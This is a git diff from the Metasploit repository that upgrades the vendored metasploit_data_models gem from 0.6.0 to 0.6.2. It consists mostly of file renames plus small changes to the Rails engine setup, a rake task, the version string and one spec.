rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20110928101300_add_mod_ref_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20110928101300_add_mod_ref_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111011110000_add_display_name_to_reports_table.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111011110000_add_display_name_to_reports_table.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111011110000_add_display_name_to_reports_table.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111203000000_inet_columns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111203000000_inet_columns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111203000000_inet_columns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111204000000_more_inet_columns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111204000000_more_inet_columns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111204000000_more_inet_columns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111210000000_add_scope_to_hosts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20111210000000_add_scope_to_hosts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20111210000000_add_scope_to_hosts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120126110000_add_virtual_host_to_hosts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120411173220_rename_workspace_members.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120411173220_rename_workspace_members.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120411173220_rename_workspace_members.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120601152442_add_counter_caches_to_hosts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000000_add_vuln_details.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000000_add_vuln_details.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000000_add_vuln_details.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000001_add_host_details.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000001_add_host_details.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000001_add_host_details.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000002_expand_details.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000002_expand_details.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000002_expand_details.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000003_expand_details2.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000003_expand_details2.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000003_expand_details2.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000004_add_vuln_attempts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000004_add_vuln_attempts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000004_add_vuln_attempts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000005_add_vuln_and_host_counter_caches.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000006_add_module_details.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000006_add_module_details.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000006_add_module_details.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000007_add_exploit_attempts.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000007_add_exploit_attempts.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000007_add_exploit_attempts.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000008_add_fail_message.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120625000008_add_fail_message.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120625000008_add_fail_message.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20120718202805_add_owner_and_payload_to_web_vulns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/db/migrate/20130228214900_change_required_columns_to_null_false_in_web_vulns.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm/host/operating_system_normalization.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/mdm/host/operating_system_normalization.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/mdm/host/operating_system_normalization.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/base64_serializer.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/base64_serializer.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/base64_serializer.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb
new file mode 100644
index 0000000000..0c73ec36d8
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/engine.rb
@@ -0,0 +1,23 @@
+require 'rails'
+
+module MetasploitDataModels
+ class Engine < Rails::Engine
+ # @see http://viget.com/extend/rails-engine-testing-with-rspec-capybara-and-factorygirl
+ config.generators do |g|
+ g.assets false
+ g.fixture_replacement :factory_girl, :dir => 'spec/factories'
+ g.helper false
+ g.test_framework :rspec, :fixture => false
+ end
+
+ initializer 'metasploit_data_models.prepend_factory_path', :after => 'factory_girl.set_factory_paths' do
+ if defined? FactoryGirl
+ relative_definition_file_path = config.generators.options[:factory_girl][:dir]
+ definition_file_path = root.join(relative_definition_file_path)
+
+ # unshift so that Pro can modify mdm factories
+ FactoryGirl.definition_file_paths.unshift definition_file_path
+ end
+ end
+ end
+end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/serialized_prefs.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/serialized_prefs.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/serialized_prefs.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/ip_format_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/ip_format_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/ip_format_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/password_is_strong_validator.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/validators/password_is_strong_validator.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/validators/password_is_strong_validator.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb
similarity index 96%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb
index 6532b907d4..c390409678 100755
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/lib/metasploit_data_models/version.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/metasploit_data_models/version.rb
@@ -4,5 +4,5 @@ module MetasploitDataModels
 # metasploit-framework/data/sql/migrate to db/migrate in this project, not all models have specs that verify the
 # migrations (with have_db_column and have_db_index) and certain models may not be shared between metasploit-framework
 # and pro, so models may be removed in the future. Because of the unstable API the version should remain below 1.0.0
- VERSION = '0.6.0'
+ VERSION = '0.6.2'
 end
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake
new file mode 100644
index 0000000000..fc5357034e
--- /dev/null
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/lib/tasks/yard.rake
@@ -0,0 +1,26 @@ +# @note All options not specific to any given rake task should go in the .yardopts file so they are available to both +# the below rake tasks and when invoking `yard` from the command line + +if defined? YARD + namespace :yard do + YARD::Rake::YardocTask.new(:doc) do |t| + # --no-stats here as 'stats' task called after will print fuller stats + t.options = ['--no-stats'] + + t.after = Proc.new { + Rake::Task['yard:stats'].execute + } + end + + desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods" + task :stats => :environment do + stats = YARD::CLI::Stats.new + stats.run('--compact', '--list-undoc') + end + end + + # @todo Figure out how to just clone description from yard:doc + desc "Generate YARD documentation" + # allow calling namespace to as a task that goes to default task for namespace + task :yard => ['yard:doc'] +end \ No newline at end of file diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/metasploit_data_models.gemspec similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/metasploit_data_models.gemspec rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/metasploit_data_models.gemspec diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/script/rails similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/script/rails rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/script/rails 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb similarity index 99% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb index 904a19fe0b..cd1ba8c0c4 100644 --- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/app/models/mdm/web_vuln_spec.rb +++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/app/models/mdm/web_vuln_spec.rb @@ -2,7 +2,7 @@ require 'spec_helper' describe Mdm::WebVuln do let(:confidence_range) do - 1 .. 100 + 0 .. 100 end let(:default_params) do diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/Rakefile similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/Rakefile rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/Rakefile diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/javascripts/application.js similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/javascripts/application.js rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/javascripts/application.js 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/stylesheets/application.css
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/assets/stylesheets/application.css
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/assets/stylesheets/application.css
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/controllers/application_controller.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/controllers/application_controller.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/controllers/application_controller.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/helpers/application_helper.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/helpers/application_helper.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/helpers/application_helper.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/mailers/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/mailers/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/mailers/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/models/.gitkeep
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/models/.gitkeep
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/models/.gitkeep
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/views/layouts/application.html.erb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/app/views/layouts/application.html.erb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/app/views/layouts/application.html.erb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config.ru
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config.ru
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config.ru
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb
similarity index 98%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb
index 52720f259a..12e48c8451 100644
--- a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/application.rb
+++ b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/application.rb
@@ -2,7 +2,7 @@ require File.expand_path('../boot', __FILE__) require 'rails/all' -Bundler.require +Bundler.require(*Rails.groups) # require the engine being tested. In a non-dummy app this would be handled by the engine's gem being in the Gemfile # for real app and Bundler.require requiring the gem. require 'metasploit_data_models' diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/boot.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/boot.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/boot.rb diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/database.yml.example similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/database.yml.example rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/database.yml.example diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environment.rb similarity index 100% rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environment.rb rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environment.rb 
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/development.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/development.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/development.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/production.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/production.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/production.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/test.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/environments/test.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/environments/test.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/backtrace_silencers.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/backtrace_silencers.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/backtrace_silencers.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/inflections.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/inflections.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/inflections.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/mime_types.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/mime_types.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/mime_types.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/secret_token.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/secret_token.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/secret_token.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/session_store.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/session_store.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/session_store.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/wrap_parameters.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/initializers/wrap_parameters.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/initializers/wrap_parameters.rb
diff --git a/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb b/lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/routes.rb
similarity index 100%
rename from lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.0/spec/dummy/config/routes.rb
rename to lib/gemcache/ruby/1.9.1/gems/metasploit_data_models-0.6.2/spec/dummy/config/routes.rb
